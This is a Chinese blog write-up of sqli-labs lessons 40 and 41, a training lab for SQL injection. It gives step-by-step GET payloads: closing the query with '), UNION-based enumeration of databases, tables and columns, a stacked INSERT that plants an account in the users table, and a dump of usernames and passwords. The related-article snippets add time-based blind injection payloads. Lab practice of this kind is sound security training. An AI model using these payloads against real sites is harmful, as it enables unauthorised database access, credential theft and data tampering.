(手工)【sqli-labs40、41】堆叠注入、盲注

最新推荐文章于 2024-02-24 23:13:02 发布
最新推荐文章于 2024-02-24 23:13:02 发布
阅读量1.5k 收藏 8
点赞数 3
分类专栏: # 【全】sqlil-abs靶场 文章标签: web安全 数据库 sql
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_53079406/article/details/125802899
版权

目录

一、推荐:

二、(手工)SQL注入基本步骤:

三、Less40(GET - BLIND based - String - Stacked)

3.1、简介:(堆叠注入-盲注-字符型注入)

 3.2、第一步:注入点测试

 3.3、第二步:分析过滤

3.4、第三步:判断字段数/回显位

3.5、第四步:暴库

3.6、第五步:爆表名

3.7、第六步:爆字段

 3.8、第七步:堆叠注入账号

3.9、第八步:爆数据

四、Less41(GET - BLIND based -Intiger Stacked)

5.1、简介:(堆叠注入-盲注-数字型注入)

5.2、利用:

一、推荐:

【SQL注入】堆叠注入icon-default.png?t=M666https://blog.csdn.net/qq_53079406/article/details/125798787?spm=1001.2014.3001.5501【SQL注入】数字型注入 & 字符型注入icon-default.png?t=M666https://blog.csdn.net/qq_53079406/article/details/125741101?ops_request_misc=%257B%2522request%255Fid%2522%253A%2522165786402616781435435338%2522%252C%2522scm%2522%253A%252220140713.130102334.pc%255Fblog.%2522%257D&request_id=165786402616781435435338&biz_id=0&utm_medium=distribute.pc_search_result.none-task-blog-2~blog~first_rank_ecpm_v1~rank_v31_ecpm-1-125741101-null-null.185^v2^control&utm_term=%E6%95%B0%E5%AD%97%E5%9E%8B&spm=1018.2226.3001.4450

【SQL注入-无回显】布尔盲注:原理、函数、利用过程icon-default.png?t=M666https://blog.csdn.net/qq_53079406/article/details/125275974?ops_request_misc=%257B%2522request%255Fid%2522%253A%2522165786796416782248562911%2522%252C%2522scm%2522%253A%252220140713.130102334.pc%255Fblog.%2522%257D&request_id=165786796416782248562911&biz_id=0&utm_medium=distribute.pc_search_result.none-task-blog-2~blog~first_rank_ecpm_v1~rank_v31_ecpm-5-125275974-null-null.185^v2^control&utm_term=%E7%9B%B2%E6%B3%A8&spm=1018.2226.3001.4450【SQL注入-无回显】时间盲注:原理、函数、利用过程icon-default.png?t=M666https://blog.csdn.net/qq_53079406/article/details/125096394?ops_request_misc=%257B%2522request%255Fid%2522%253A%2522165786796416782248562911%2522%252C%2522scm%2522%253A%252220140713.130102334.pc%255Fblog.%2522%257D&request_id=165786796416782248562911&biz_id=0&utm_medium=distribute.pc_search_result.none-task-blog-2~blog~first_rank_ecpm_v1~rank_v31_ecpm-3-125096394-null-null.185^v2^control&utm_term=%E7%9B%B2%E6%B3%A8&spm=1018.2226.3001.4450

二、(手工)SQL注入基本步骤:

第一步:注入点测试

第二步:分析权限

第三步:判断字段数

第四步:爆数据库名

第五步:爆表名

第六步:爆字段名

第七步:堆叠注入账号

第八步:查询

三、Less40(GET - BLIND based - String - Stacked)

3.1、简介:(堆叠注入-盲注-字符型注入)

请求方法:GET

方法:堆叠注入+')闭合(字符型注入)+盲注+联合查询

 3.2、第一步:注入点测试

?id=1

正常页面

 

输入?id=1'

非正常页面

说明存在注入点,存在单引号闭合

 

 ?id=1'--+

非正常页面

说明还存在其他闭合

 

?id=1')--+

正常页面

通过上述测试可以得出

存在注入点

且为')闭合

 3.3、第二步:分析过滤

方法一:

考虑一步一步将注入语句字符一个一个替换掉,直到不报错(浪费时间)

或者全部替换(如果报错,不知道哪里被过滤了)

方法二:

获取源码进行白盒审计(最优)

3.4、第三步:判断字段数/回显位

?id=1') union select 1,2,3 --+

回显正常

 

?id=1') union select 1,2,3,4 --+

非正常回显

 说明字段数为3

判断回显位

?id=-1') union select 1,2,3 --+

 

3.5、第四步:暴库

?id=-1') union select 1,2,database() --+

3.6、第五步:爆表名

?id=-1') union select 1,2,group_concat(table_name) from information_schema.tables where table_schema=database() --+

 

3.7、第六步:爆字段

?id=-1') union select 1,2,group_concat(column_name) from information_schema.columns where table_name='users' --+


 

 3.8、第七步:堆叠注入账号

?id=1');insert into users(id,username,password) values ('40','less40','at40')--+

 

3.9、第八步:爆数据

?id=-1') union select 1,2,group_concat(username,password) from security.users--+

能看见我们注入的数据

 

四、Less41(GET - BLIND based -Intiger Stacked)

5.1、简介:(堆叠注入-盲注-数字型注入)

请求方法:GET

方法:堆叠注入+闭合(数字型注入)+盲注+联合查询

5.2、利用:

与Less40相比

41是数字型注入,不需要闭合

黑色地带(崛起)
关注
  • 3
    点赞
  • 8
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
sqli-labs-master靶场安装下载
04-01
安装phpstudy、sqli-labs 适合人群:小白 安装sqli-labs报错如何解决
Sqli-labs 堆叠注入篇 (Less38~53)
angry_program的博客
02-15 1246
前言 本blog作为练习笔记, 文笔不才, 仅供参考, 不正之处望大神指正。 堆叠注入篇对应labs的38~53关: Less-38 字符型堆叠注入 虽然用很常规的方法都可以注入成功,但是并不侧重于注入爆数据; 而是考察堆叠注入: http://localhost:2333/Less-38/index.php ?id=0' union select 1...
Less 49
老司机开代码的博客
08-04 158
文章目录1. 题目分析2. 注入过程 1. 题目分析 通过?sort=2%27 and sleep(0.5) --+可判断存在时间注入漏洞。并且传入的参数类型为字符串。 因此,利用rand()进行布尔盲注是无法使用的。 然后再来测一下双注入。 网站给报错也屏蔽了,双注入也凉凉了。 那么我们使用时间注入。 2. 注入过程 既然确定了注入的手段,过程就是老生常谈的事情了。 给出一条payload ?sort=2%27 and if(ascii(substr(database(),1,1))=115,sleep
mysql时间 注入 sleep_SQL注入进阶
weixin_29442195的博客
01-28 1010
原标题:SQL注入进阶 1、时间注入攻击时间注入攻击的测试地址:http://ccctf.cn/sql/time/time.php?id=1。访问该网址时,页面返回yes,在网址的后面加上一个单引号,再次访问,页面返回no。这个结果与Boolean注入非常相似,下面介绍遇到这种情况时的另外一种注入方法——时间盲注。它与Boolean注入的不同之处在于,时间注入是利用sleep或benchmark等...
布尔盲注+时间盲注+堆叠注入
最新发布
2301_80661529的博客
02-24 432
布尔盲注比较麻烦,但是也是必不可少的一项技能布尔函数主要是当我们遇到没有明显回显的情况下使用:主要由length函数,substr函数,ascll函数组成的语句length():返回该字符串的长度。ascll():返回该字符的ascll码。substr():用于截取字符串。(参考ascll码表)substr(<查询语句>,<截断的起始位置>,<截取的字符个数>)--(第一个字符索引为1)
SQL注入进阶-order by注入
AkangBoy的博客
11-06 8134
本文从order by原理简介开始,详细描述了order by注入原理以及多种注入姿势,包含order by union select注入、order by if()注入、order by sleep()注入、order by报错注入
利用sqli-labs了解order by注入
qq_51769881的博客
06-09 280
(2)方法二:通过两个查询分别加括号的方式,注意 order by 不能出现在union的子句中,但可以出现在子句的子句中。(1)方法一:去掉前一个select语句的 order by,意思是先union再对整个结果集order by。(0)注意union在没有括号的情况下只能使用一个 order by,如果直接运行如下语句,会报错。​ union会过滤掉两个结果集中重复的行,而union all不会过滤掉重复行。(1)lines terminated by 写入。​ 利用条件:开启错误提示。
sql注入之order by注入
qq_45627785的博客
08-05 4100
Jan 1, 0001 00:00 · 427 words · 3 minute readCTF 了解order by order by盲注 结合union来盲注 基于if()盲注 需要知道列名 不需要知道列名 基于时间盲注 基于rang()的盲注 order by 报错注入 updatexml extractvalue 在安恒杯看到了利用order by进行盲注,记得自己之前好像总结过order by后的注入方法,翻..
SQL注入之ORDER BY注入
m0_74834253的博客
02-22 1161
使用ORDER BY语句不仅支持对单列数据的排序,还支持对数据表中多列数据的排序。需要注意的是这样注入的效率很低,还是应该先考虑其他的注入方式最后在采用时间盲注。order by还支持多个字段自定义排序,通过逗号隔开,但只能在数字之间进行自定义排序,若选择字符类型则会根据第一个列名的排序规则进行排序。为true或者false时,排序结果是不同的,但因为序列相同所以就可以使用rand()函数进行盲注了。
SQL注入:order by注入
qq_68163788的博客
01-30 1405
Order by注入是一种SQL注入攻击的类型,它利用了在SQL查询中使用order by子句来对结果进行排序的漏洞。在正常情况下,order by子句会根据指定的列对结果进行排序,但是如果应用程序没有对用户提供的输入进行正确的验证和过滤,攻击者就可以利用这个漏洞来执行恶意的SQL查询。 通过在order by子句中插入恶意的SQL代码,攻击者可以获取敏感数据、修改数据库内容或者执行其他恶意操作。例如,攻击者可以利用order by注入来发现数据库中的表名、列名或者获取敏感数据。
『Java安全SQL安全-ORDER BY注入
Ho1aAs‘s Blog
01-03 1691
# 原理 SQL中:ORDER BY执行排序后面需要指定列名,该列名是不能被引号包含的否则就会被认为是一个字符串。 而PrepareStatment使用占位符传递参数时,会用单引号包裹参数,因此不能使用预编译 所以使用ORDER BY要搭配字符串拼接上列名
jeakinscheung-sqli-labs-php7-master.zip
03-16
sqli创建数据库连接发现连接不了,这种原因是现在大部分人用的php7,原版的sqli只支持php5.
windows环境下安装sqli-labs
11-04
windows server 2012 环境下,安装sqli-labs的详细教程,适合新手小白,大神可以参考一下,有不足的地方请联系我。
sqli-labs-master.zip
11-20
最新sqli-labs代码,自己也可以到github下载:https://github.com/Audi-1/sqli-labs
sqli-labs(php7.3以上可运行)
01-29
学习sql注入的开源平台
SQL注入盲注堆叠注入
qq_43036356的博客
05-24 107
所谓盲注就是在服务器没有错误回显的时候完成的注入攻击。服务器没有错误回显,对于攻击者来说缺少了非常重要的“调试信息”
SQL注入
qq_63785498的博客
06-10 1933
SQL注入语句:1、1';-- -查看有哪些库2、1';-- -查看有哪些表3、1';-- -查看表里面有哪些字段4、1';-- -查看表里面所有字段的内容。
mysql 堆叠查询_SQL 注入方法 - 盲注、报错注入、UNION查询注入堆叠注入
weixin_36403587的博客
02-27 305
盲注关键点是 根据页面返回内容分析 Payload 中的问题是否为真,然后通过多次测试遍历出想要的数据布尔盲注目标地址:http://newspaper.com/items.php?id=2对应的SQL语句:SELECT title, description, body FROM items WHERE ID = 2然后攻击者尝试返回 false 的查询:http://newspaper.com/...
使用order by排序判断返回结果的列数,order by排序判断字段数原理详解
热门推荐
wangyuxiang946的博客
10-30 1万+
「作者主页」:士别三日wyx order by排序猜解列数原理详解一、order by的两种使用方式1)按照字段名排序2)按照索引排序二、order by怎么判断字段数?1)正常的排序3)错误的排序         使用「联合注入」(SQL注入漏洞的利用方式之一)进行脱库的时候,需要判断页面显示的「字段」数量,也就是返回的查询结果包含几个字段,最常用的一种判断方式就是利用 order by 排序判断字段数。 一、orde.
sqli-labs注入靶场搭建
09-25
sqli-labs是一个用来学习sql注入的环境。搭建sqli-labs注入靶场可以按照以下步骤进行操作: 1. 准备软件:首先,你需要准备一个支持PHP和MySQL的服务器环境,例如Apache服务器、PHP解释器和MySQL数据库。 2. 下载sqli-labs:你可以从官方网站或代码托管平台上下载sqli-labs的压缩包。 3. 解压缩sqli-labs:将下载的压缩包解压到服务器环境的Web目录中,确保解压后的文件夹名为"sqli-labs"。 4. 配置数据库:创建一个MySQL数据库,并将数据库连接配置信息写入sqli-labs的配置文件中。 5. 设置权限:确保Web服务器对sqli-labs文件夹及其内容具有读写权限。 6. 访问sqli-labs:通过浏览器访问sqli-labs的URL,例如"http://localhost/sqli-labs",应该能够看到sqli-labs的主界面。 以上是基本的sqli-labs注入靶场搭建的步骤。你可以根据自己的环境进行相应的配置和调整。如果遇到问题,可以参考sqli-labs的文档或寻求相关的帮助。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

黑色地带(崛起)

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值